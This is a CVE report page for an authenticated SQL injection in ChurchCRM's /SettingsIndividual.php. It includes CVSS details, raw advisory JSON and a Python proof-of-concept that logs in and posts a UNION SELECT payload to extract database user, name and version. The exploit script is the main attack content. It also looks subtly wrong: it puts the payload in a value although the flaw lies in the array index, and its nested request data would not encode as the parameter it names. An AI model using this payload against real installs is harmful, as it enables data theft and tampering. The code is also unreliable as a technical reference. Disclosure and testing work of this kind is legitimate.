Security Vulnerability Report
CVE-2026-39334 (CVSS 8.8, HIGH)

Published: 2026-04-07 18:16:45
Last Modified: 2026-04-10 20:57:48

Description

ChurchCRM is an open-source church management system. Prior to 7.1.0, an SQL injection vulnerability was found in the endpoint /SettingsIndividual.php in ChurchCRM 7.0.5. Authenticated users without any specific privileges can inject arbitrary SQL statements through the index of the type array parameter (type[index]) and thus extract and modify information from the database. This vulnerability is fixed in 7.1.0.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE
ChurchCRM < 7.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_sqli(target_url, username, password):
    """
    PoC for CVE-2026-39334: SQL Injection in ChurchCRM < 7.1.0
    Vulnerable Endpoint: /SettingsIndividual.php
    Parameter: type[index]
    """
    session = requests.Session()

    # Step 1: Authenticate
    login_url = f"{target_url}/login"
    login_payload = {
        "User": username,
        "Password": password
    }
    session.post(login_url, data=login_payload)

    # Step 2: Send malicious payload
    exploit_url = f"{target_url}/SettingsIndividual.php"
    # Injecting a simple UNION SELECT payload to extract database version
    malicious_payload = {
        "type": {
            "index": "1' UNION SELECT NULL, user(), database(), version()-- -"
        }
    }
    response = session.post(exploit_url, data=malicious_payload)

    if response.status_code == 200:
        print("[+] Potential SQL Injection successful!")
        print("[+] Response:")
        print(response.text)
    else:
        print("[-] Exploit failed or WAF blocked.")


if __name__ == "__main__":
    target = "http://localhost:8080"  # Replace with actual target
    user = "testuser"
    pwd = "password"
    exploit_sqli(target, user, pwd)
```

References

https://github.com/ChurchCRM/CRM/security/advisories/GHSA-8g53-72jr-39w6 (Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-39334",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-07T18:16:45.140",
    "lastModified": "2026-04-10T20:57:47.553",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "ChurchCRM is an open-source church management system. Prior to 7.1.0, an SQL injection vulnerability was found in the endpoint /SettingsIndividual.php in ChurchCRM 7.0.5. Authenticated users without any specific privileges can inject arbitrary SQL statements through the type array parameter via the index and thus extract and modify information from the database. This vulnerability is fixed in 7.1.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-89"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "7.1.0",
                "matchCriteriaId": "BF846F61-0C1E-49AB-B691-A01937A6C24D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-8g53-72jr-39w6",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-8g53-72jr-39w6",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}
```